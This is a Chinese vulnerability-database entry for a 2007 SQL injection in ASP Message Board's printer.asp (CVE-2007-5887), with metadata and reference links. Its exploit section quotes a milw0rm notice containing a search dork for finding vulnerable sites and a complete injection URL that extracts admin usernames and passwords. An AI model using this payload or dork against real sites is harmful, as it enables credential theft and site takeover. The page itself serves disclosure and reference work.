ASP Message Board Printer.ASP SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1113908 漏洞类型 SQL注入
发布时间 2007-11-05 更新时间 2007-11-15
CVE编号 CVE-2007-5887 CNNVD-ID CNNVD-200711-097
漏洞平台 ASP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/4609
https://www.securityfocus.com/bid/26334
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200711-097
|漏洞详情
ASPMessageBoard2.2.1c版本的boards/printer.asp中存在SQL注入漏洞。远程攻击者可以借助id参数执行任意SQL指令。
|漏洞EXP
* Bug Found On : "ASP Message Board"
*
* Found By : Q7x
* 
* Home : Www.Larestankids.coM ( Ashiyane2 Security Team )
*
* Dork : inurl:"printer.asp?forum="
*
* Version : 2.2.1c
*
* Bug : ASP Message Board - printer.asp - Remote Sql Injection Exploit
*
* Exploit : Admin User / Password : http://www.site.com/boards/printer.asp?forum=AMB_xxxx&id=xxxx or 1=convert(int,(select top 1 convert(varchar,isnull(convert(varchar,Admin),'NUL L'))%2b'/'%2bconvert(varchar,isnull(convert(varcha r,Password),'NULL'))%2b'/'%2bconvert(varchar,isnul l(convert(varchar,Username),'NULL')) from AMB_REGISTEREDUSERS))

# milw0rm.com [2007-11-05]
|受影响的产品
Infuseum ASP Message Board 2.2.1 c
|参考资料

来源:XF
名称:asp-message-printer-sql-injection(38264)
链接:http://xforce.iss.net/xforce/xfdb/38264
来源:BID
名称:26334
链接:http://www.securityfocus.com/bid/26334
来源:MILW0RM
名称:4609
链接:http://www.milw0rm.com/exploits/4609